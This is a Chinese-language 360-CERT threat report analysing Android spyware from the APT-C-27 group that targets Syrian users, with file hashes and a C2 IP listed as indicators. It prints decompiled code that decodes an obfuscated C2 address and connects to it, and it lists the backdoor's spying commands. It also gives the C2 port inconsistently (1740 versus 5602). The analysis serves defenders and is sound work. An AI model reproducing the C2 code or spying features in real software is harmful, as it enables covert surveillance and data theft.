报告编号:B6-2018-122901
报告来源:360-CERT
报告作者:360-CERT
更新日期:2018-12-29
0x00 背景介绍黄金鼠组织(APT-C-27)对叙利亚地区展开了有组织、有计划、有针对性的长时间不间断攻击。其团伙主要以APK、PE、VBS、JS文件作为攻击载体,涉及Android和windows两大平台,利用社交网络和鱼叉邮件等方式散布和传播恶意载荷。
对黄金鼠组织基础设施进行长期监控,发现近期有新的移动恶意软件投入使用,360CERT 对本次新一轮的移动攻击活动进行披露。
0x01 活动概述本次捕获到的样本,使用了黄金鼠固有资产82.137.255.56,并且样本TTP与黄金鼠高度重合,所以我们高度自信,这是APT-C-27新一轮的移动攻击活动。
今年十月中旬,360CERT在 《 "黄金鼠"组织近期攻击样本分析 》 中对黄金鼠PC平台攻击活动进行披露,发现该组织基础设施高度复用。
长期跟踪过程中,捕获到最新投入使用的安卓恶意软件。经过拓展,发现在2017到2018年活跃的样本如下:
03cbba87c2130a67cece5d009f1b2f6ebd2e4328 0a20cd126ef13e25ebbe8dba8ee34e60b25a957b 19c67606396ae04ca10b2097016eb292f9cf15a7 219ae76db7c1ad04b5985a2476cf7cdd26c69b00 226ceabd4971a43a6b8641399a589f93b19a752c 2727cb46f8ceaca2a6a8ca299a05f7232c8a9a5b 2e1b39c86044e2e83515068198cd1c7cc598cd2c 57eec6f0b8fb47933d81d0af6ecba944ea93e5ee 5d9c175d8b84c03c7e656e5b29a7b9ab69e5a17b 6cc07434307e7da11e37a86fa449eac810bffc50 91f0c8313052d7cf4b0ed24445699e741890b4e8 a1d5e20efa26251ddb115c574860a7a3314141d8 a619d354b60f9f7ad149d4a3b86a8598c2a474c6 af6133e2985ebbf3224c421e156222b9ed5c8ad1 bf15b8d406afd30e50a0f7bcf3d2b4469c47cbe4 ca44a5ed83636cc233c2a78aac83809f9d916427 cbae43259dd89e5806e722e282fb68a3009fca2d d8a711aaa008f3bf18cd1a77008d7bd674630e99 d9c09f7d8df0276d55cdd15de62a7b073162a3bf e0bf86e5215faea63f6916512d9c3f498d1a6e99攻击样本伪装成WhatsApp、Telegram、ChatPrivacy、ChatSecure或者系统更新补丁,通过钓鱼邮件或者即时通信软件进行传播。
最常使用的签名SHA1:
560179d86732f0197a3d27175a6ae53fabdd42d7 2538d6e8c0d1b5d42faa7c25aa8af955a3a02a21 8f59154986ed5acbb57037ada2049fce0c075523 5388e926d9b95a607a25e341d8d199f33da5764a最常使用的资源文件SHA1:
2a162cdce82782bb10a476f25c6fe39b91fef305 4005c61c64b9a286991526942d4ceba4619c6c86 6467c9b2f7361f066e2fa884b454646024dca191近两年的移动端攻击活动如下:
近期新捕获到活动的样本(d92a8b3e5804b7b081063e73175fa3a7e20ed691),伪装成Telegram应用,样本行为以及C2结构变化不大。
最新样本详细分析如下:
0x02 样本详细分析样本运行截图:
com.sevandbatch.augseva_*.hzma.PcketPrvidr.java 中声明了f_IP_RAW以及f_OIRT_RAW
public static String f_IP_RAW = "@uu2_1u37u_2#u#.#u6";
public static int f_PORT_RAW = 1640;
public static String get_ipraw() {
return f_IP_RAW.replace("@", "8").replace("u", "").replace(".", ".").replace("#", "5");
}
In [3]: tmpa.replace("@", "8").replace("u", "").replace(".", ".").replace("#", "5") Out[3]: '82_137_255.56' synchronized (PcketPrvidr.f_socket) { PcketPrvidr.f_socket.connect(new InetSocketAddress(lbyName_InetAddress, PcketPrvidr.f_PORT_RAW + 100), 2500); }通信地址为82.137.255.56:1740
出现黄金鼠组织的相关用户名关键词
Mr.R@dd3x Raddex_ Raddxx 行为摘要
获得移动数据网络状态
获得当前路径
获得设备当前信息已经状态
获得wifi名称
以root执行命令
注册广播接受类,对系统关机事件进行处理。并且尝试获得root权限
通过辅助功能接口,对短消息内容进行读取并且保存
注册约定的命令编号
相机拍摄当前情况照片 改变C2地址 执行内容 复制文件 删除文件 下载文件 GPS关闭 GPS开启 获得安装应用 获得当前C2信息 获得调用log 获得通讯录 获得文件 获得短消息 创建目录 移动文件 重命名文件 执行文件 交互式shell 开始录音 停止录音 上传文件 Ping
通过PcketPrvidr.java->HandlePacket进行相应操作
建立外部连接
回传信息方式
读取待传递对象,将对象格式化成xml格式
通过thoughtworks.xstream.XStreamer.java中实现的方法进行
然后再以如下格式再组成新的xml,通过socket直接发送
命令编号 对象内容 成功状态 附带消息并且,我们在源代码中发现使用了阿拉伯语
新活动的样本与往期样本差别不大,历史样本摘要如下:
0x03 基础设施分析
后门程序使用IP和C2服务器通信。主机IP为:82.137.255.56,通信端口为:5602。这个IP地址是黄金鼠组织的固有IP资产,曾经多次在其攻击活动中出现。该IP的地理位置位于叙利亚,ASN为AS29256。
目前仅开放了80端口。
0x04 总结
样本内容使用了阿拉伯语,很明显,本次活跃的移动攻击活动仍是针对阿拉伯国家。样本的代码注释和源代码中使用了阿拉伯语,可以判断黄金鼠组织成员熟练掌握阿拉伯文。阿拉伯语可能是其母语。
本次使用的C2服务器是黄金鼠组织的固有资产,常常使用不同的端口来区分攻击线路,本次使用的端口1740,作为移动端固定攻C2端口,在往期攻击活动中曾经出现过。
从历史活跃来看,移动端攻击没有去年强烈,并且整体的攻击策略没有改变,依旧是伪装知名聊天软件更新,系统更新,诱惑受害者下载安装。最新发现的样本表明,黄金鼠在移动端的攻击活动依旧会持续下去。
0x05 IOCsFile:
03cbba87c2130a67cece5d009f1b2f6ebd2e4328 0a20cd126ef13e25ebbe8dba8ee34e60b25a957b 19c67606396ae04ca10b2097016eb292f9cf15a7 219ae76db7c1ad04b5985a2476cf7cdd26c69b00 226ceabd4971a43a6b8641399a589f93b19a752c 2727cb46f8ceaca2a6a8ca299a05f7232c8a9a5b 2e1b39c86044e2e83515068198cd1c7cc598cd2c 57eec6f0b8fb47933d81d0af6ecba944ea93e5ee 5d9c175d8b84c03c7e656e5b29a7b9ab69e5a17b 6cc07434307e7da11e37a86fa449eac810bffc50 91f0c8313052d7cf4b0ed24445699e741890b4e8 a1d5e20efa26251ddb115c574860a7a3314141d8 a619d354b60f9f7ad149d4a3b86a8598c2a474c6 af6133e2985ebbf3224c421e156222b9ed5c8ad1 bf15b8d406afd30e50a0f7bcf3d2b4469c47cbe4 ca44a5ed83636cc233c2a78aac83809f9d916427 cbae43259dd89e5806e722e282fb68a3009fca2d d8a711aaa008f3bf18cd1a77008d7bd674630e99 d9c09f7d8df0276d55cdd15de62a7b073162a3bf e0bf86e5215faea63f6916512d9c3f498d1a6e99 d92a8b3e5804b7b081063e73175fa3a7e20ed691IP:
82.137.255.56 0x06 时间线2018-12-25 360CERT 捕获样本
2018-12-26 360CERT 开始分析样本
2018-12-29 360CERT 360CERT完成本次报告
0x07 参考链接 "黄金鼠"组织近期攻击样本分析声明:本文来自360CERT,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如需转载,请联系原作者获取授权。